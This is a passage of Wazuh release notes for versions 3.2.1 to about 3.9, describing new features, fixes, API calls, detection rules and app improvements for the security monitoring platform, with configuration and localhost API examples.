                "end_scan": "2019-04-30 05:29:50",
                "score": 22,
                "fail": 7,
                "hash_file": "4c7d05c9501ea38910e20ae22b1670b4f778669bd488482b4a19d179da9556ea",
                "start_scan": "2019-04-30 05:29:50",
                "total_checks": 9,
                "name": "System audit for SSH hardening",
                "policy_id": "system_audit_ssh"
            },
            ...
        ]
    }
}
  • Dive into your SCA scan results using the API.

GET /sca/001/checks/system_audit_ssh
{
    "error": 0,
    "data": {
        "totalItems": 76,
        "items": [
            {
                "description": "The option MaxAuthTries should be set to 4.",
                "file": "/etc/ssh/sshd_config",
                "remediation": "Change the MaxAuthTries option value in the sshd_config file.",
                "policy_id": "system_audit_ssh",
                "rationale": "The MaxAuthTries parameter specifies the maximum number of authentication attempts permitted per connection. Once the number of failures reaches half this value, additional failures are logged. This should be set to 4.",
                "id": 1508,
                "title": "SSH Hardening - 9: Wrong Maximum number of authentication attempts",
                "result": "failed",
                "compliance": [
                {
                    "key": "pci_dss",
                    "value": "2.2.4"
                }
                ],
                "rules": [
                {
                    "type": "file",
                    "rule": "f:$sshd_file -> !r:^\s*MaxAuthTries\s+4\s*$;"
                }
                ]
            },
            ...
        ]
    }
}
Wazuh app

Wazuh manager configuration editor

Edit the content of the configuration file for one or more nodes using the interface editor.

Ruleset editor

Thanks to the recently added Wazuh API endpoints, the app comes with multiple improvements for the ruleset section, including rules, decoders and CDB list management.

Expand visualizations

For those cases you want to see a visualization bigger than it is, you can click the expand icon.

Other additions and improvements

  • Added new dashboards for SCA and Docker modules.

  • Added support for more than one Wazuh monitoring pattern.

  • Added a cron job for fetching missing fields of all valid index patterns, also merging dynamic fields every time an index pattern is refreshed by the app.

  • Added a new way to read manager logs.

  • Added resizable columns by dragging in tables.

Wazuh ruleset
  • Added new options <same_field> and <not_same_field> to correlate dynamic fields in rules.

    <rule id="100002" level="7" frequency="3" timeframe="300">
        <if_matched_sid>100001</if_matched_sid>
        <same_field>netinfo.iface.name</same_field>
        <same_field>netinfo.iface.mac</same_field>
        <not_same_field>netinfo.iface.rx_bytes</not_same_field>
        <options>no_full_log</options>
        <description>Testing options for correlating repeated fields</description>
    </rule>
    
  • Improved rules for Docker to prevent the activation of certain rules that should not be activated.

  • Modified the structure and the names for Windows EventChannel fields in all the related rules.

  • Fixed the brute-force attack rules for Windows EventChannel by adding the new <same_field> option and changing some rules.

  • Added Sysmon rules for Windows EventChannel.

    <rule id="61619" level="0">
        <if_sid>61618</if_sid>
        <field name="win.eventdata.parentImage">\\services.exe</field>
        <description>Sysmon - Legitimate Parent Image - svchost.exe</description>
    </rule>
    
    
    <rule id="61620" level="12">
        <if_group>sysmon_event1</if_group>
        <field name="win.eventdata.image">lsm.exe</field>
        <description>Sysmon - Suspicious Process - lsm.exe</description>
        <group>pci_dss_10.6.1,pci_dss_11.4,gdpr_IV_35.7.d,</group>
    </rule>
    
  • Added a new rule to catch logon success from a Windows workstation.

    <rule id="60118" level="3">
        <if_sid>60106</if_sid>
        <field name="win.eventdata.workstationName">\.+</field>
        <field name="win.eventdata.logonType">^2$</field>
        <description>Windows Workstation Logon Success</description>
        <options>no_full_log</options>
        <group>authentication_success,pci_dss_10.2.5,gpg13_7.1,gpg13_7.2,gdpr_IV_32.2,</group>
    </rule>
    

3.8.2 Release notes - 31 January 2019

This section shows the most relevant fixes in version 3.8.2. A complete list of changes is provided in the change log.

Wazuh manager
  • Fixed a bug crashing Analysisd when accumulating logs. This bug affected decoders that use the option <accumulate>, like the decoder for OpenLDAP logs, provided out of the box.

  • Some fields of alerts related to Windows Eventchannel logs included unwanted backslashes (\) and trailing whitespaces. This was due to a log cleaning issue in the manager.

Wazuh agent
  • Prevent Modulesd from crashing when the configuration contained a <wodle name="command"> stanza without an explicit <tag> option.

3.8.1 Release notes - 24 January 2019

This section shows the most relevant improvements and fixes in version 3.8.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed memory leak in Logcollector when reading Windows eventchannel.

  • Fixed version comparisons on Red Hat systems in vulnerability detector module.

Wazuh API
  • Fixed an issue with the log rotation module which could make the Wazuh API unavailable on Debian systems.

  • Fixed improper error handling, preventing internal paths from being printed in error output.

3.8.0 Release notes - 18 January 2019

This section shows the most relevant improvements and fixes in version 3.8.0. More details about these changes are provided in each component changelog:

Wazuh core

Support for new AWS services

  • AWS Config

  • AWS Trusted Advisor

  • AWS KMS

  • AWS Inspector

  • Add support for IAM roles authentication in EC2 instances.

Adding new kind of buckets to your integration is as simple as adding an entry like this to your AWS configuration:

<bucket type="config">
  <name>wazuh-aws-wodle</name>
  <path>config</path>
</bucket>

The alerts that Wazuh sends to Elasticsearch now include all these AWS additions, so you can track all your AWS services and buckets using Kibana.

Windows events are collected in native JSON

  • The inventory features for Windows now use native queries directly to the Windows API. This enriches the Windows inventory and guarantees that you can check your Windows agents accurately.

  • Windows events are now fetched in JSON format, which is more useful for third-party software and allows Wazuh to analyze Windows events more efficiently. This improves Windows alert quality and analysis performance. From this version, Windows agents apply a new ruleset.

  • FIM for Windows agents now has the ability to detect changes in attributes and file permissions.

Agents keys polling module

When Remoted reads an invalid key, it can now retrieve the correct key from an external database server and store it in the client.keys file.

Details:

  • Integrated agent key request to external data sources.

  • Look for missing or old agent keys when Remoted detects an authorization failure.

  • Request agent keys by calling a defined executable or connecting to a local socket.

FIM who-data changes

  • Added a health check for who-data monitoring features. It checks whether the Audit events socket is working before starting the who-data engine, in order to avoid listening to it when it's blocked or disabled.

  • Checks whether a rule already exists before trying to insert it, to avoid flooding the audit.log file.

  • The who-data module is now able to reconnect to the Audit socket even if SELinux is in enforcing mode. Before this enhancement, Wazuh could not reconnect to the socket after a restart if enforcing mode was used along with Audit.

CDB lists auto build

Now the CDB lists are built at installation time, so there is no need to execute ossec-makelists as before for the default lists. Custom lists (added after installation) still need to be compiled manually.
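
For custom lists, a minimal sketch of the manual step, assuming the default /var/ossec installation path and that the new list has already been declared in the ruleset configuration:

/var/ossec/bin/ossec-makelists

This should regenerate the compiled .cdb files for lists whose source files have changed.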

Other Wazuh core fixes and improvements

  • When upgrading, databases used for FIM purposes are now auto-upgraded by Wazuh (no need for scripts).

  • Vulnerability detector has been improved for RedHat systems.

  • This version also fixes some known issues when using Wazuh on ARM, HP-UX or AIX systems.

  • The Logcollector component has been refactored: multiple known issues have been fixed and its performance has also been improved.

  • Improved IP address validation in the option <white_list> (Credits to @pillarsdotnet).

  • Improved rule option <info> validation (Credits to @pillarsdotnet).

  • Fixed error description in the osquery configuration parser (Credits to @pillarsdotnet).

  • The FTS comment option <ftscomment> was not being read (Credits to @pillarsdotnet).

Wazuh API

New API calls for group management

  • Edit the group configuration file (agent.conf) by uploading an XML file with the new configuration. This gives users the ability to manage groups remotely; from now on, it is no longer necessary to SSH into the manager instance to modify groups or to add/remove agents in groups.

# curl -u foo:bar -X POST -H 'Content-type: application/xml' -d @/tmp/agent.conf.xml \
    "http://localhost:55000/agents/groups/default/files/agent.conf?pretty"
{
  "error": 0,
  "data": "Agent configuration was updated successfully"
}
  • Add or remove agents of a group in bulk.

  • Added a new parameter named format for fetching the agent.conf content in JSON or XML format depending on the parameter value, as shown below.
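
For instance, a hedged sketch of a request using this parameter (the parameter value and endpoint mirror the upload example above and are assumptions, not an excerpt from the API reference):

# curl -u foo:bar -X GET "http://localhost:55000/agents/groups/default/files/agent.conf?format=xml&pretty"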

Wazuh API also has these fixes for this version

  • Now the Wazuh API service gets the group ID and user ID properly when using Docker containers.

  • Added missing information when requesting certain files from a group.

  • Rule variables from the Wazuh ruleset are now replaced by their real values when fetching rules.

Wazuh app

Group management from the app is now available

Manage your groups from the app. This feature includes:

  • Edit the group configuration (agent.conf): just open the new XML editor, edit the group configuration and send it to the Wazuh API.

  • Adding and removing agents in groups. An intuitive view has been added to drag and drop agents into your groups; then, with a single click, your groups are updated.

New search bar for the agents' list

  • The search bar has been modified to provide a better user experience.

  • It suggests filters, allows multiple filters at the same time and combines string searches with filters, same as before but now in one place.

New tables for an agent FIM monitored files

  • The app detects the agent OS in order to show the right FIM data. For instance, if it's a Windows agent, the app shows Windows registry entries.

  • Like most of the app tables, these tables include a search bar and sortable columns.

Modify the Wazuh monitoring index pattern name

This was previously available for Wazuh alert indices; now you can do the same for monitoring indices by editing the app configuration file (config.yml).

# Default index pattern to use for Wazuh monitoring
wazuh.monitoring.pattern: wazuh-monitoring-3.x-*

Edit the app configuration file (config.yml) from the app

  • Those settings are shown at Settings > Configuration as before but now they include a pencil icon which allows you to edit certain settings.

  • Note: Some settings require Kibana to be restarted before being applied.

Other app improvements

  • The Dev Tools utility has been improved: small bugs have been fixed and columns are now resizable by dragging.

  • Template check from the app health check now accepts multipattern templates.

  • All known fields for all the index patterns are now refreshed on the app health check too.

  • Added "Registered date" and "Last keep alive" in agents table allowing you to sort by these fields.

  • The app now reports the request target when the destination is unreachable, so you'll know whether it was Elasticsearch or the Wazuh API.

Wazuh ruleset

New rules/decoders for Windows

Our ruleset this time comes with some new rules/decoders for Windows:

  • Added new rules to support the new Windows eventchannel decoder.

  • Extended the Auditd decoder to support more fields.

And we've added a new rule to alert when an agent is removed.

3.7.2 Release notes - 17 December 2018

This section shows the most relevant fixes in version 3.7.2. More details about these changes are provided in the component changelog:

Logcollector and Analysis daemon fixes

The Logcollector module received two improvements in Wazuh 3.7.2:

  • Fixed bugs related to the management of special characters such as the new line delimiter (\n), or binary data. From now on, Logcollector will discard log lines containing binary characters.

  • Fixed errors when Logcollector tried to open or analyze files that had disappeared, or when querying whether a file had reached its end.

In addition to this, the Analysis daemon has been fixed to avoid errors when Windows agents in version 3.7.0 report files whose owner username contains whitespace characters.

3.7.1 Release notes - 5 December 2018

This section shows the most relevant improvements and fixes in version 3.7.1. More details about these changes are provided in each component changelog:

Improved who data capabilities for FIM

This version comes with a new option for the FIM configuration. It is now possible to add extra Audit keys using the <audit_key> tag, which allows the who-data engine to capture Audit events related to those keys.
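
A minimal configuration sketch, assuming a directory already monitored in who-data mode (the directory, the key name and the whodata attribute are illustrative assumptions):

<syscheck>
    <directories check_all="yes" whodata="yes">/etc</directories>
    <audit_key>wazuh_fim</audit_key>
</syscheck>

With this configuration, Audit events generated by rules that use the key wazuh_fim would also be captured by the who-data engine.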

Other minor improvements

Wazuh 3.7.1 includes some other improvements:

  • Restored the support for Amazon Linux on the Vulnerability detector.

  • Improved performance of the Remote service.

  • Added IPv6 support for the host-deny.sh script from Active Response.

  • Included more tracing information to the logs generated on debugging mode.

  • The FIM engine now gives more descriptive messages when a file is not reachable.

New features for Kibana plugin

The main highlights for the Wazuh app for Kibana include a new auto-complete feature for the Dev tools tab, so now the user can start typing an API request to see a list of suggestions.

In addition to this, some refinements and bugfixes were added for better stability and overall performance.

New features for Splunk plugin

The main highlights for the Wazuh app for Splunk include support for extensions, new tabs for VirusTotal and CIS-CAT alerts, the Export as CSV button for several tables and the ability to execute PUT, POST and DELETE requests on the Dev tools tab, along with GET requests.

In addition to this, code refactoring, visual/UI adjustments, and bugfixes were added for better stability and overall performance.

3.7.0 Release notes - 10 November 2018

This section shows the most relevant improvements and fixes in version 3.7.0. More details about these changes are provided in each component changelog:

Adding agents to multiple groups

One of the major enhancements of this new version consists of adding agents to more than one group simultaneously.

With this improvement, agents can be set up using multiple configuration files, which makes it possible to share specific configuration blocks between agents and provides a more powerful way to configure the environment. The new feature allows consulting all of an agent's group information with the agent_groups tool and in the app through the Wazuh API.

In this example, an agent is added to two new groups.

# curl -u foo:bar -X PUT "http://localhost:55000/agents/001/group/webserver?pretty"
{
  "error": 0,
  "data": "Group 'webserver' added to agent '001'."
}
# curl -u foo:bar -X PUT "http://localhost:55000/agents/001/group/apache?pretty"
{
  "error": 0,
  "data": "Group 'apache' added to agent '001'."
}

And through the API, it's possible to check all the groups the agent has been added to:

# curl -u foo:bar -X GET "http://localhost:55000/agents/001?pretty"
{
  "error": 0,
  "data": {
    "status": "Active",
    "configSum": "f993610d3e6d7bfd7c008b4fb6deb8a5",
    "group": [
      "default",
      "webserver",
      "apache"
    ],
    "name": "ag-windows-12",
    ...
  }
}

The agent will receive the configuration of all the groups where it has been added.

Learn more about this feature in the multiple groups' documentation.

New module to monitor Microsoft Azure

The new azure-logs module for Wazuh can obtain and read Azure logs through several service APIs. This helps to monitor all the activity happening in the infrastructure by setting up the module to monitor the virtual machines that form the infrastructure, sending events to the Wazuh manager for analysis.

There are several ways to monitor the Azure instances:

  • Installing the Wazuh agent on the instances.

  • Monitoring the instances activity through Azure APIs. This includes data about all resource operations (creation, update, and deletion), Azure notifications about the instances, suspicious file executions, health checks, autoscaling events, and so on.

  • Monitoring the Azure Active Directory service, including management actions such as creation, update or deletion of users. It's possible to receive alerts on the Wazuh manager when any of these events occur on the Azure infrastructure.

To learn more about this new module and how to configure it, check out the section Monitoring Microsoft Azure with Wazuh.

New module to monitor Docker

The new docker module for Wazuh makes it easier to monitor and collect activity from Docker containers, such as creation, running, starting, stopping or pausing events.

In addition to this, and as always, the Wazuh agent can be used to monitor more services and events from the Docker servers, like File integrity or Log data collection.

In this example, the Docker command docker pause apache will pause the container apache and trigger an alert, as seen in the screenshot below from the Wazuh app for Kibana:

To learn more about this new module and how to configure it, check out the section Using Wazuh to monitor Docker.

Query remote configuration

It's now possible to query for the agent configuration in real time.

These on-demand queries allow retrieving the currently applied configuration on the manager and each agent at any moment. As seen in the screenshot below with some basic agent information, this query lets you check the current settings of every enabled module.

Improved performance of FIM and Analysis engines

The Analysis and Integrity Monitoring engines have been enhanced with multithreaded processing. This takes advantage of all the manager host's resources by processing events in parallel, getting more performance at a lower cost.

The records generated by the File Integrity Monitoring system are now stored in a new SQLite database. In addition, the required storage resources have been reduced, making it faster and more efficient.

Breaking changes

The old File Integrity Monitoring plain text databases are no longer in use. After the upgrading process, it's necessary to execute the migration script in order to preserve the previous FIM entries.

Distributed API requests in cluster mode

The cluster capabilities were improved to allow distributed API requests. The nodes now communicate with each other to collect information, such as agent status or logs, providing data related to the global architecture instead of a single instance.

In addition to this, the last keepalive checks on the cluster nodes have been improved, disconnecting nodes that lose connectivity for a certain amount of time.

Advanced API filtering using queries

In this version, the Wazuh API includes a new filtering system. The q parameter allows requesting information using advanced queries with logical operators and separators. Find a more detailed explanation of this feature in the API queries section.
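
A hedged sketch of such a query (the field names and the use of ';' as a logical AND separator are assumptions used for illustration):

# curl -u foo:bar -X GET "http://localhost:55000/agents?q=status=active;os.platform=ubuntu&pretty"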

New features for Kibana plugin

The Wazuh app for Kibana includes new features and interface redesigns to make use of the new features included in this version:

  • Get the current manager/agent configuration on the redesigned tabs.

  • Added support for multiple groups feature.

  • The Amazon AWS tab has been redesigned to include better visualizations and the module configuration.

  • The new Osquery extension shows scans results from this Wazuh module.

  • Added a new selector to check the cluster nodes’ status and logs on the Management > Status/Logs tabs.

  • Several bugfixes, performance improvements, and compatibility with the latest Elastic Stack version.

Breaking changes

Wazuh 3.7.0 introduces an update to the Elasticsearch template. This will cause a breaking change in existing installations, although new installations won't be affected by this error.

To learn more about how to fix this, check out the Kibana app's troubleshooting guide.

New features for Splunk plugin

The Wazuh app for Splunk also receives many new features and improvements in this new version. The Configuration tab has been improved, as in the Kibana plugin, to show the current manager/agent configuration and to support multiple groups. In addition:

  • A documentation article to set up a reverse proxy configuration for Nginx and the Splunk plugin is now available.

  • Added Dev tools, Amazon AWS, Osquery, Inventory data and Monitoring tabs to the app.

  • Added app logs so you can check and troubleshoot problems while using the app.

  • Added a new selector to check the cluster nodes’ status and logs on the Management > Status/Logs tabs.

  • Several bugfixes, performance improvements, and compatibility with the latest Splunk version.

3.6.1 Release notes - 7 September 2018

This section shows the most relevant improvements and fixes in version 3.6.1. More details about these changes are provided in each component changelog.

Wazuh core

This release is a patch version that fixes some issues encountered in v3.6.0. Some of them are listed below:

  • The agent.name field has been put back to the alerts in JSON format. On the other hand, we've fixed a problem in the location description of the plain-text alerts.

  • Vulnerability Detector has been improved to support Debian Sid (the unstable version).

  • We have also optimized the memory management on agents for AIX and HP-UX systems.

  • The daemon start and stop list has been reordered in the agent service.

  • We have corrected the actual recursion level limit in FIM real-time mode.

  • We have improved the AWS integration parser and its capabilities.

  • Some other fixes have been applied on this version.

Wazuh API

In this version, the API makes it possible to send Active Response requests, including custom commands that are not declared in the configuration.

For instance:

curl -u foo:bar -X PUT -d '{"command":"restart-ossec0", "arguments": ["-", "null", "(from_the_server)", "(no_rule_id)"]}' -H 'Content-Type:application/json' "http://localhost:55000/active-response/001?pretty"
{
  "error": 0,
  "message": "Command sent."
}

3.6.0 Release notes - 29 August 2018

This section shows the most relevant improvements and fixes in version 3.6.0. More details about these changes are provided in each component changelog.

Wazuh core

This section shows the main features introduced in this new version for the Wazuh core.

Logcollector

Logcollector has been enhanced with two new features:

  • Now it works in multithread mode. This will improve the throughput and prevent delays among outputs.

  • Wildcard reloading is now supported: files that match a wildcarded location will be monitored without needing to restart the agent.

File integrity monitoring

The policy monitoring (rootcheck) and file integrity monitoring (syscheck) engines now run independently, so they both can perform a scan at the same time.

Two new features have been added to file integrity monitoring:

  • Tags for monitored items. This will make alert matching and classification easier.

  • A new option to limit the recursion level (scanning folder depth) has been introduced (see the sketch after this list).
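
A minimal syscheck sketch combining both additions (the tags and recursion_level attribute names, as well as the monitored path, are assumptions used for illustration):

<syscheck>
    <directories check_all="yes" tags="webserver" recursion_level="3">/var/www</directories>
</syscheck>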

Wazuh modules
  • Introducing a re-work of the AWS S3 integration, now supporting CloudTrail, GuardDuty, Macie, IAM, and VPC Flow log data.

  • The download of OVAL files for Vulnerability Detector has been fixed, since Red Hat changed the protocol used to serve these files.

  • Custom command execution (wodle command) supports MD5/SHA1/SHA256 validation of the target binary for execution authorization.

Log analysis and management
  • The manager will provide remote message statistics, including counts of messages received or dropped and the number of active TCP sessions.

  • The size limit for logs has been extended from 6 KiB to 64 KiB.

  • The analysis engine now interprets the hostname field of the input logs as the name of the agent, instead of name+IP. This allows CDB list lookup of agent name.

Wazuh app for Kibana
  • Support for Kibana v6.4.0.

  • Added new options to config.yml to change shards and replicas settings for wazuh-monitoring indices.

  • Improved building package procedure.

  • The welcome tabs in Overview and Agents have been updated with a new name and description for the existing sections.

  • Adapted for Internet Explorer 11.

Wazuh app for Splunk

The Splunk app has been redesigned from the ground up based on Material Design.

  • SplunkJS framework (RequireJS + BackboneJS + JQuery) has been wrapped into AngularJS.

  • Brand new menus, tabs, filters and settings.

  • Dynamic visualizations, granting improved performance.

  • Dynamic filter queries.

You can follow our installation guide to test it out: https://documentation.wazuh.com/current/installation-guide/installing-splunk/index.html

3.5.0 Release notes - 10 August 2018

This section shows the most relevant improvements and fixes in version 3.5.0. More details about these changes are provided in each component changelog.

Wazuh core
  • A new integration with osquery has been added, providing new scheduled results to the manager:

    • The osquery daemon will be launched in the background.

    • Filter events by osquery by adding a new option in <location> rules.

    • Enrich osquery configuration with pack files aggregation and agent labels.

    • Support folders in shared configuration.

  • Parallelized remoted daemon:

    • Up to 16 parallel threads to decrypt messages from agents.

    • The frequency of agent key reloading has been limited.

    • Added a message input buffer in Analysisd to prevent control message starvation in Remoted.

  • Vulnerability Detector has been enhanced, adding support for other operating systems and improving the configuration of OVAL updates.

    • Added a feed tag for updating each operating system's OVAL, allowing a different configuration for each of them.

    • Packages already scanned won't be checked unless no Syscollector scans are detected in a period longer than 24 hours.

    • Added arch check for Red Hat's OVAL.

    • Force the vulnerability detection in unsupported OS with the <allow> attribute.

  • Fixed the alert format in Vulnerability Detector. When showing Vulnerability Detector alerts from a Red Hat agent, an RHSA patch was shown instead of a CVE. Each RHSA patch bundles several CVEs; the RHSA patches are now unpacked, and alerts show that the system is vulnerable to each of the CVEs contained in that RHSA.

  • Added support for AES encryption between manager and agents.

  • Enhanced active response process. Added a new feature which allows the user to customize the parameters sent to the agent's active response script.

  • Added synchronization for Remoted counters (rids), which are reloaded if the inode of the file has changed.

  • Windows deletes pending active-responses when an output signal is received.

  • Rootcheck now searches for both 32-bit and 64-bit registry keys. As the Windows agent only runs in 32-bit mode, Rootcheck previously searched only for 32-bit keys by default.

  • Get Linux packages, DEB and RPM, for Syscollector.

  • Added a new module for downloading shared files for agent groups dynamically.

  • Get running processes, opened ports, network interfaces, Linux (DEB/RPM) and Windows inventories natively for Syscollector.

    • Added a field to the hardware inventory for RAM usage, without using wmic.

    • Storage of multiple addresses/netmasks/broadcasts per interface in the DB.

    • CentOS 5 compatibility to run the network scan.

Wazuh API
  • Added information about the user who made the request in the API logs.

  • New option for downloading the wpk using HTTP in agent_upgrade.

  • Rotation of log files at midnight.

  • Added new API requests for syscollector.

  • Ignore uppercase and lowercase sorting an array.

Wazuh ruleset
  • Added rules for the new osquery integration.

  • Improved CIS-CAT rules.

  • Added a rule to ignore Syscollector events.

Wazuh app for Kibana
  • As part of the Elastic Stack v6.3.x compatibility process, now we have support for Kuery as query language for the app search bars.

  • Added new tab on Configuration to show the current Wazuh app configuration file values.

  • Added new tab on Configuration to show the latest Wazuh app logs.

  • Added XML/JSON viewer to Management → Configuration.

  • Improved reports, now with a better design and document structure.

  • Human-readability improvements for visualizations, tables and CSV files.

  • Now it’s possible to remove all the API entries from Settings.

  • More design improvements for the Welcome tab on some app sections.

  • More bug fixes, code refactoring and performance improvements.

In addition to this, the documentation now has a dedicated section for the Wazuh app, where you can learn more about its capabilities, how to configure it and install the X-Pack Security plugin.

3.4.0 Release notes - 24 July 2018

This section shows the most relevant improvements and fixes in version 3.4.0. More details about these changes are provided in each component changelog.

Wazuh core

The main feature introduced in this version is the ability to monitor the information relative to the user who makes changes to any file monitored with FIM. This information (who-data) contains the user who makes the changes and also the process used. This new functionality is available in Syscheck on Linux and Windows. See the Auditing who-data section for further information.

Many other improvements and fixes have been included in Syscheck in this new version:

  • The level of recursiveness when scanning directories can be defined in the internal_options.conf file. By default, it's set to 256.

  • Added support for SHA256 checksum (by Arshad Khan @arshad01).

  • Enhanced visualization of Syscheck alerts and insertion of all the available fields in the Syscheck messages from the Wazuh configuration files.

  • The value xxx (not enabled) was replaced with n/a when the hash couldn't be calculated.

  • Fixed registry_ignore problem on syscheck for Windows when arch="both" was used.

  • Allow more than 256 directories in real-time for Windows agent using recursive watchers.

There are other changes which are worth highlighting:

  • Added a new option to customize the output format per-target in Logcollector.

  • Added support for unified WPK. Now the WPK files are compatible between versions for the same OS.

  • The CA verification was fixed to allow more than one 'ca_store' definition.

Wazuh API
  • Added a new API request: GET /agents/stats/distinct. This new request returns all the different combinations that agents have for the selected fields (a request sketch follows this list).

  • Added experimental_feature option to enable new features in development.
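
A hedged sketch of this request (the fields parameter name and values are assumptions used for illustration):

# curl -u foo:bar -X GET "http://localhost:55000/agents/stats/distinct?fields=os.platform,version&pretty"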

Wazuh ruleset
  • In older versions, the frequency attribute in rules was the number of hits plus 2. In this version, this value has been modified to match exactly the number of hits, making it easier to understand.

Wazuh app for Kibana
  • Tables redesign.

  • Improved reporting capabilities.

  • Improved Discover performance.

  • UI redesign, including simpler Welcome screen.

  • New healthcheck design.

  • Dev tools one liners.

  • New inventory tab.

  • Minor bugfixes.

Wazuh app for Splunk
  • Support for Splunk v7.1.2.

  • Dashboard tabs redesign.

  • Minor bugfixes.

3.3.1 Release notes - 18 June 2018

This section shows the most relevant improvements and fixes in version 3.3.1. More details about these changes are provided in each component changelog.

Wazuh core

Most of the fixes introduced in this new version are focused on the user experience when managing Wazuh, improving log messages and fixing configuration issues, among other things. There are a few changes worth highlighting:

  • Fixed a bug that prevented the remote upgrades for Ubuntu agents.

  • An alert has been added to be aware when the process of unmerging the centralized configuration fails.

  • Prevent interference between the Windows Defender antivirus and the Wazuh agent when managing temporary bookmark files.

  • It is now possible to set up empty configuration blocks for some modules. For example, the vulnerability detector module can be enabled by typing <wodle name="vulnerability-detector"/>, applying the default configuration for that module.

Wazuh API
  • The request to delete agents includes two new fields: the agents affected by the deletion request and the failed IDs.

  • Fixed an error when trying to upgrade never-connected agents through the API.

3.3.0 Release notes - 8 June 2018

This section shows the most relevant improvements and fixes in version 3.3.0. More details about these changes are provided in each component changelog.

Wazuh core

Logcollector now supports socket connections for log output mirroring. This feature allows sending the same event to the Wazuh manager and to a third-party log processor such as Fluent Bit. You can find more information here.

The analysis engine includes new options for the plugin decoders to set the input offset with respect to the prematch expression or the parent decoder. See an example about this on this section. In addition, plugin decoders and multi-regex decoders can be used together.

We have also introduced an event formatter in Logcollector to build custom events, which allows adding extra data to the event.

As of this version, the timestamp of the alerts in JSON format will include milliseconds.

The implementation of the Agentless daemon has been improved for enhanced security.

Some other fixes and improvements have been introduced in the Framework and the Cluster.

Wazuh API

The API now has filters by group on the GET /agents call and by status on the GET /agents/groups/:group_id call.

The limit parameter has been modified so that all items can be retrieved using limit=0.
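
A hedged sketch combining both additions (the group parameter name and the group value are assumptions used for illustration):

# curl -u foo:bar -X GET "http://localhost:55000/agents?group=webserver&limit=0&pretty"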

In addition to this, several bugfixes and performance improvements for the API have been added.

Wazuh app for Kibana
  • New design for the Overview and Agents tabs, following a breadcrumbs-based navigability to change between different sections.

  • New Reporting option, for generating reports about the current state of the visualizations on the Overview and Agents tabs.

  • New filters for agent version and cluster node on the Agents Preview tab.

  • Added a warning when your system doesn't have more than 3GB of RAM.

  • Several bugfixes and performance improvements.

Wazuh app for Splunk
  • Added monitoring for collecting periodical agent status data.

  • The .wazuh index will now be the default one if none is selected.

  • Several bugfixes and performance improvements.

3.2.4 Release notes - 1 June 2018

This section shows the most relevant improvements and fixes in version 3.2.4. More details about these changes are provided in each component changelog.

Wazuh minor fixes

Most of the bug fixes in this release are fairly minor, but a few fixes deserve special mention:

  • The <queue_size> setting was not properly parsed by Maild, causing the termination of the process.

  • Fixed Python 3 incompatibilities in the framework that could affect the correct behavior of the cluster.

Wazuh app for Splunk

This release includes:

  • New GDPR tab.

  • Multi-API support.

  • Multi-index support.

  • Several performance improvements and bug fixes.

Wazuh app for Kibana

Relevant changes in the Wazuh app are:

  • New reporting feature: Generate reports from Overview and Agents tab.

  • New check included to warn about systems with low RAM (less than 3GB).

  • Several performance improvements and bug fixes.

3.2.3 Release notes - 28 May 2018

This section shows the most relevant improvements and fixes in version 3.2.3. More details about these changes are provided in each component changelog.

GDPR Support

The General Data Protection Regulation took effect on 25th May 2018. Wazuh helps with most technical requirements, taking advantage of features such as File Integrity or Policy monitoring. In addition, the entire Ruleset has been mapped following the GDPR regulation, enriching all the alerts related to this purpose.

You can read more information about the GDPR regulation and how Wazuh addresses it in this section: Using Wazuh for GDPR compliance.

Wazuh cluster

This version fixes several performance issues (like CPU usage) and synchronization errors. The communications and synchronization algorithm have been redesigned in order to improve the cluster performance and reliability.

Now, the client nodes initiate the communication, and only the master node is included in the client configuration.

The number of daemons has been reduced to one: wazuh-clusterd.

You can check our documentation for the Wazuh cluster in the Cluster basics section.

Core improvements

These are the most relevant changes in the Wazuh core:

  • Vulnerability-detector continues to expand its scope, now adding support for Amazon Linux. A bug when comparing epoch versions has also been fixed.

  • The agent limit has been increased to 14000 by default, improving the manager availability in large environments.

  • More internal bugs reported by the community have been fixed for this version.

Wazuh app for Splunk

New section describing the installation process for the Wazuh app for Splunk.

Wazuh app for Kibana

The Dev tools tab has been added in this version. You can use it to interact with the managers by API requests.

Similar to PCI DSS, a new tab for GDPR is included in order to visualize the related alerts.

Other relevant changes in the Wazuh app are:

  • New button for downloading lists in CSV format. Currently available for the Ruleset, Logs and Groups sections on the Manager tab, and also on the Agents tab.

  • New option on the configuration file for enabling or disabling the wazuh-monitoring indices creation/visualization.

  • Design improvements for the Ruleset tab.

  • Performance improvements on visualization filters.

  • And many bugfixes for the overall app.

3.2.2 Release notes - 7 May 2018

From the Wazuh team, we continue working hard to improve the existing features and fix bugs. This section shows the most relevant improvements and fixes in version 3.2.2. Find more details in each component changelog.

Manager-agent communication

An input buffer has been created on the manager side. This queue acts as congestion control by processing all the events incoming from agents.

Among other features of this queue, it dispatches events as fast as possible, avoiding delays in the communication process, and it warns when it gets full and stops ingesting more events.

In addition, the capacity of the buffer is configurable in the remote section of the Local configuration.

Wazuh modules

The Vulnerability Detector module includes an improved version comparison algorithm to avoid false positive alerts. The behavior when an agent's software inventory is missing has also been fixed.

Wazuh app: Kibana

The Wazuh app received lots of new improvements for this release. In addition to several bugfixes and performance improvements, these are the major highlights for this Wazuh app version:

  • New dynamic visualization loading system. The app now loads visualizations on demand and never stores them on the .kibana index.

  • A new design for the Ruleset tab, providing the information about the rules and decoders in a cleaner, more organized way.

  • A new system for role detection over index patterns when using the X-Pack plugin for the Elastic Stack.

  • Refinements and adjustments to the user interface.

Other relevant changes

In addition to the previous points, other changes included are:

  • The Slack integration has been updated since some used parameters were deprecated by Slack. This integration allows Wazuh to send notifications to Slack when desired alerts are triggered.

  • Fixed the agent group file deletion when using the Auth daemon, as well as the daemon's client for old versions of Windows.

  • Fixed the filter of the output syslog daemon when filtering by rule group.

3.2.1 Release notes - 2 March 2018

This release is a bug fix release. This section shows the most relevant improvements and fixes of Wazuh v3.2.1. You will find more detailed information in the changelog file.

Wazuh modules

The Wazuh modules include several fixes in this release to improve their performance and reliability. The most relevant changes are described in this section.

To avoid agent flooding, a maximum number of events sent per second has been established for every module. This limit is configurable via the wazuh_modules.max_eps parameter of the internal configuration.
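
A minimal sketch of tuning this limit, assuming it is set in the local internal options file (the file path and the value shown are assumptions, not recommendations):

# /var/ossec/etc/local_internal_options.conf
wazuh_modules.max_eps=100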

For the Vulnerability Detector module, the following bugs have been fixed: a problem when detecting agents with supported operating systems, and others related to duplicated alerts and RAM consumption. Furthermore, this module is no longer included in the agents, reducing package size and preventing errors.

In addition, a bug that made it impossible to set the centralized configuration of the agents software collector has been solved.

For the CIS-CAT wodle, the Java binary selection has been improved, its rules have been updated, and support has been added for relative/full/network paths in its configuration.

